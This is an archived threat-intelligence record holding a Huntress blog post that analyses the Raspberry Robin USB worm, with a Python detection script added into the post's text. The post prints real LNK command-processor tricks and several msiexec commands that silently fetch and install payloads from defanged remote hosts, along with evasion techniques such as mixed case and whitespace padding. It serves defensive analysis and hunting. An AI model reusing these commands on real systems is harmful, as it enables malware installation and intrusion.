{
	"id": "6bc9f53f-0550-4d9f-bcb2-baffebc8df19",
	"created_at": "2026-04-10T03:21:28.734183Z",
	"updated_at": "2026-04-10T03:22:17.479111Z",
	"deleted_at": null,
	"sha1_hash": "742e474d94551edc1410b7ceefa024ca2a8964c4",
	"title": "Evolution of USB-Borne Malware, Raspberry Robin",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 785847,
	"plain_text": "Evolution of USB-Borne Malware, Raspberry Robin\r\nBy Harlan Carvey\r\nPublished: 2023-09-07 · Archived: 2026-04-10 03:00:51 UTC\r\nDue to our extensive and diverse customer base, Huntress “sees” a good bit of the same malicious activity others are seeing, albeit often from a slightly different perspective.\r\nOne example: not long ago, Huntress analysts investigated an INC ransom group incident at a time when that group had only recently been observed by others. In other cases, Huntress analysts may observe elements of attacks or campaigns that differ slightly from what other, similar firms experience.\r\nSince July 2022, Huntress has observed the USB device-borne Raspberry Robin malware across our customer base off and on. In that time, we’ve seen different variations of the malware, as well as an evolution of the response to it. While there has been no regular cadence of infections, it’s clear that a combination of human-managed EDR and human-managed antivirus provides a great deal of detection and response capability in the face of such infections.\r\nWhat Is Raspberry Robin?\r\nRaspberry Robin is malware that has been described as a “USB worm”, because USB devices are the primary delivery mechanism observed to this point. A user interacts with a file on a USB device, and their system becomes infected with the Raspberry Robin malware.\r\nRaspberry Robin has been seen to be part of a much larger malware ecosystem and acts as a possible precursor to additional ransomware deployment. 
However, unlike other worms, this malware has not been observed propagating to other endpoints on its own.\r\nhttps://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin\r\nPage 1 of 4\n\nRaspberry Robin Infection Chain\r\nThe typical Raspberry Robin infection chain follows what has previously been shared: the user connects the infected USB device and double-clicks a Windows shortcut/LNK file, whose target feeds the contents of an apparent “junk” file containing an MSIExec command into the command processor.\r\nHuntress analysts have observed several variations of the commands embedded within these Windows shortcut/LNK files, including:\r\ntYPe Wycz.Cfg|CMD\r\ncMd\u003cxPhfk.sav\r\n!ComSpEc!\u003cxnjhM.v\r\n!coMSPEc!\u003cFN.iCo\r\nThese commands redirect or “pipe” the contents of the “junk” files into the command processor, denoted by either “cmd” or “!comspec!”. More recently, Huntress observed a command line that contained a significant amount of white space within the command line itself; that is to say, a number of carriage returns and tab characters were included in the command line, likely in an attempt to evade detection.\r\nThe user double-clicking the Windows shortcut/LNK file has been observed within EDR telemetry as an Explorer.exe process associated with the name of the shortcut file:\r\nEXPLORER \"USB DISK\"\r\nEXPLORER \"USB DRIVE\"\r\nexpLorER \"ADATA UFD\"\r\nEXPlOrEr \"HBCD 15_2\"\r\nWhen the “junk” file is processed by the command processor, a Microsoft Installer Executable (MSIExec) command is launched, which downloads a remote file to the endpoint.\r\nHuntress has observed a number of similarities in these commands, and in particular in the remote resources they access. For example, as with earlier commands in the infection process, the command itself is of mixed case, alternating between upper- and lower-case letters. The domain accessed for the resource is most often three characters long, and the top-level domain is two characters. 
Finally, the port accessed has been 8080. Examples of commands observed by Huntress analysts are as follows:\r\nmsiexec.exe -qUIeT /I HTtp://5g7[.]AT:8080/y8yNq/iZR/whjn/Ax6q80a/Y1Z5/j/fs/VTSAO?xxxx \u003credacted\u003e\r\nFUBb=jxbCAQtnu\"msIeXeC YliNpQ=YgYdWQ /q VZFfOPaC=gwiIp jE=jnlD -fV \"hTtP://FxB[.]tw:8080/AMBG/9FlMJgrIkRjJfVw2bWSju/Machine=User\"\r\nMsIEXEc HbeLpYii=TPvbe WyWsZiUBG=mpV /I \"hTTP://eJK[.]bz:8080/BC/A3Y7fxb0oDMXkstfQGYd/Machine?User\" -qUIeT ZS=xKG Kvbzhtp=UpyZqTff vQtPdg=mWb\r\nmSIExeC zkrZ=CtX /qN wZd=VgaoYGD /PACKAgE \"HtTP://jRx[.]fR:8080/yKyC/bSis/yUp0OSNBN0eTTIjpK/Machine=User\" dJYsmgC=pBVHKGG ieJ=SIYm Pm=cdFDvckT\r\nmSiexeC\\tBIQGitHuP=OsdHlvG\\tjYRdyzQwc=Hwr\\t/fV\\t\\\"hTTp://ZjC[.]bz:8080/AoA3LSHNJCaFIM/hMgkh/62oyni/\u003credacted\u003e EnksxM=KdVZ vTECB=bHLmevjk -QUIET\\tWx=iY LdP=VEfGlpn\\tMcxWT=zTtlOkU\r\nFinally, persistence is established by creating a value beneath the user’s RunOnce Registry key. As Microsoft stated:\r\nEntries in the RunOnce key delete the registry entry prior to launching the executable content at sign-in. Raspberry Robin re-adds this key once it is successfully running to ensure persistence. After the initial infection, this leads to RunOnce.exe launching the malware payload in timelines. Raspberry Robin also temporarily renames the RunOnce key when writing to it to evade detections.\r\nAs a result, the malware persists by recreating a value beneath the user’s RunOnce Registry key each time the value is removed from the key and its content executed.\r\nHunting for Raspberry Robin\r\nDuring August 2023, Huntress analysts observed a Raspberry Robin infection attempt—one that failed to complete. Notification of the infection attempt came via detections based on Huntress EDR telemetry and Managed Microsoft Defender alerts. 
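An added hunting example, written for this page and not part of the Huntress post: a small Python scorer for the two command-line stages described in the infection chain section, first the LNK target that feeds a “junk” file into the command processor, then the msiexec download that follows. It keys on the traits the post lists (mixed case, embedded tabs and carriage returns, a three-character domain under a two-character TLD, port 8080, a quiet install from an http URL). Of the sample lines, only the first msiexec command is copied from the post; the others are constructed, and abc[.]xy and downloads.example.com are placeholders rather than observed infrastructure.

```python
# Added example, not code from the Huntress post. Scores command lines against
# the two stages of the Raspberry Robin chain described above: the LNK target
# that feeds a junk file into the command processor, and the msiexec download.
from urllib.parse import urlsplit

TAB, CR, LF, DQ = chr(9), chr(13), chr(10), chr(34)     # written as chr() so no escapes are needed
SHELLS = ('cmd', 'cmd.exe', '!comspec!', '%comspec%')   # %comspec% is the usual env-var form of !comspec!
INSTALL_SWITCHES = {'i', 'package', 'a'}                 # /f[p|o|e|d|c|a|u|m|s|v] repair switches handled below
QUIET_SWITCHES = {'q', 'qn', 'qb', 'quiet', 'passive'}
STRONG = {'short_domain', 'port_8080', 'mixed_case', 'whitespace_padding'}


def reads_junk_file(cmdline):
    # Stage one: input redirection into the shell (cmd<FN.iCo, !comspec!<x.v) or
    # the output of type piped into it (type Wycz.Cfg|cmd). Returns the file or None.
    lower = cmdline.lower()
    if '<' in lower:
        before, after = lower.split('<', 1)
        if before.split() and before.split()[-1].endswith(SHELLS) and after.split():
            return after.split()[0].split('|')[0]
    if '|' in lower:
        left, right = lower.split('|', 1)
        tokens = left.split()
        if right.split() and right.split()[0] in SHELLS and len(tokens) >= 2 and tokens[0] == 'type':
            return tokens[1]
    return None


def _switch(token):
    # msiexec accepts both / and - as switch prefixes; return the bare lower-case name.
    return token[1:].lower() if token[:1] in ('/', '-') and len(token) > 1 else None


def _mixed_case(token):
    # Neither all-lower nor all-upper: the random case alternation the post describes.
    return token != token.lower() and token != token.upper()


def _is_install(switch):
    return switch in INSTALL_SWITCHES or (switch[:1] == 'f' and set(switch[1:]) <= set('poedcaumsv'))


def analyze(cmdline):
    # Stage two: the msiexec download. Only a quiet install from a URL can reach
    # a positive verdict; mixed case alone never does (see the usage note).
    indicators = []
    if any(c in cmdline for c in (TAB, CR, LF)):
        indicators.append('whitespace_padding')       # tabs / CRs embedded in the command line
    tokens = [t.strip(DQ) for t in cmdline.split()]   # split() also collapses that padding
    exe = [t for t in tokens if 'msiexec' in t.lower()]
    if not exe:
        return {'msiexec': False, 'url': None, 'indicators': indicators, 'verdict': 'not_msiexec'}
    if any(_mixed_case(t) for t in [exe[0]] + [t for t in tokens if _switch(t)]):
        indicators.append('mixed_case')
    switches = [s for s in map(_switch, tokens) if s]
    install = any(_is_install(s) for s in switches)
    quiet = any(s in QUIET_SWITCHES for s in switches)
    url = next((t.replace('[.]', '.') for t in tokens           # refang the post's [.] notation
                if t.lower().startswith(('http://', 'https://'))), None)
    if url:
        parts = urlsplit(url.lower())
        if parts.scheme == 'http':
            indicators.append('http_cleartext')
        try:
            if parts.port == 8080:
                indicators.append('port_8080')
        except ValueError:                                # non-numeric port in a mangled URL
            pass
        labels = (parts.hostname or '').split('.')
        if len(labels) == 2 and len(labels[0]) == 3 and len(labels[1]) == 2:
            indicators.append('short_domain')             # e.g. 5g7[.]at, fxb[.]tw, ejk[.]bz
    verdict = 'benign'
    if url and quiet and install:
        indicators.append('quiet_remote_install')
        hits = len(STRONG & set(indicators))
        verdict = 'raspberry_robin_pattern' if hits >= 2 else 'remote_install_review'
    return {'msiexec': True, 'url': url, 'indicators': indicators, 'verdict': verdict}


# Constructed sample lines for this example. Only page_example is copied from the post;
# abc[.]xy and downloads.example.com are placeholders, not observed infrastructure.
SAMPLES = {
    'page_example': 'msiexec.exe -qUIeT /I HTtp://5g7[.]AT:8080/y8yNq/iZR/whjn/Ax6q80a/Y1Z5/j/fs/VTSAO?xxxx',
    'padded': TAB.join(['mSIExeC', 'zkrZ=CtX', '/qN' + CR + LF + 'wZd=VgaoYGD', '/PACKAgE',
                        DQ + 'HtTP://abc[.]xy:8080/AoA3/Machine=User' + DQ, 'dJYsmgC=pBVHKGG']),
    'benign_remote': 'msiexec.exe /qn /i https://downloads.example.com/agent-1.2.3.msi',
    'benign_local': 'MsiExec.exe /X{00000000-0000-0000-0000-000000000000} /qn',
}

if __name__ == '__main__':
    for name, line in SAMPLES.items():
        result = analyze(line)
        print(name, result['verdict'], result['indicators'])
    print(reads_junk_file('cmd /C!coMSPEc!<FN.iCo'), reads_junk_file('tYPe Wycz.Cfg|CMD'))
```

Mixed case on its own is deliberately not enough for a verdict: Windows itself records MsiExec.exe in uninstall strings, so a camel-cased binary name would otherwise be a constant false positive, and the benign_local sample shows it is not. A quiet remote install from an ordinary host (benign_remote) comes back as remote_install_review rather than benign, since that is still worth a look in EDR telemetry. Both functions tokenise with str.split, so the tab and carriage-return padding described above does not break either match.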
The following table illustrates a timeline excerpt of the events as the infection attempt unfolded:\r\n12:20:32Z - User connects “USB Disk 3.0” device “USB\\VID_13FE\u0026PID_6300\\070393698CF56A96” to the endpoint; a lookup identifies this device as a Phison Electronics Corp device, SN: 070393698CF56A96\r\n12:21:12Z - User double-clicks “USB DISK.lnk”, launching “cmd /C!coMSPEc!\u003cFN.iCo”, which runs msiexec.exe (in this case, “mSiexeC”) to download and install a file from http://ZjC[.]bz:8080. Huntress detected the Raspberry Robin execution pattern.\r\n12:23:06Z - Windows Defender detects downloaded file “C:\\ProgramData\\Rmbizw\\felgs.evmg” and submits it to the Defender cloud.\r\n12:24:06Z - Windows Defender detects the submitted file as “Trojan:Win32/Wacatac.H!ml”, with persistence established via the user’s RunOnce Registry key. The file is successfully removed.\r\n12:26:26Z - MsiInstaller process fails; message, “WhOYztO -- Installation failed.”\r\nAt the time of the Huntress investigation of the Raspberry Robin execution pattern detection, the “C:\\ProgramData\\Rmbizw\\felgs.evmg” file was not found on the endpoint. Further, there was no indication within the EDR telemetry for the endpoint of RunOnce.exe executing the malware.\r\nData from the endpoint Windows Event Logs indicates that the USB device in question was connected to the endpoint repeatedly during January 2023, the earliest observed time being January 6, 2023. Each time the device was connected to the endpoint, Windows Defender detected the file “D:\\USB DISK.lnk” as “Trojan:Win32/VintageDynamo.A”. The earliest available MsiInstaller message within the Windows Event Log data timeline is from March 28, 2022, which significantly pre-dates the January 6, 2023 connection of the “USB Disk 3.0” device, so the available log data covers that period; however, there are no MsiInstaller events associated with a Raspberry Robin infection attempt until August 21, 2023. 
This likely indicates that the USB device was infected prior to January 6, 2023, and supports the understanding that the user must double-click the Raspberry Robin Windows shortcut file on the USB device to activate the infection.\r\nConclusion\r\nHuntress Managed EDR and Managed Microsoft Defender work together to provide overlapping layers of endpoint protection. Applying a combination of Managed EDR and Managed Microsoft Defender enables both active defense against threats as they take place and visibility into how these threats appear.\r\nAs shown in the above example, pivoting from Managed AV detections can reveal an infection chain, highlighting other touchpoints for analysts to look for should Managed AV fail in the future. Through continuous analysis and review of alerting, and by digging into the context surrounding a given alarm when it fires, network defenders can gain greater perspective on how events take place and awareness of what additional mitigations should be applied to ensure across-the-board coverage against adaptive, persistent threats.\r\nSource: https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin"
	],
	"report_names": [
		"evolution-of-usb-borne-malware-raspberry-robin"
	],
	"threat_actors": [],
	"ts_created_at": 1775791288,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/742e474d94551edc1410b7ceefa024ca2a8964c4.pdf",
		"text": "https://archive.orkl.eu/742e474d94551edc1410b7ceefa024ca2a8964c4.txt",
		"img": "https://archive.orkl.eu/742e474d94551edc1410b7ceefa024ca2a8964c4.jpg"
	}
}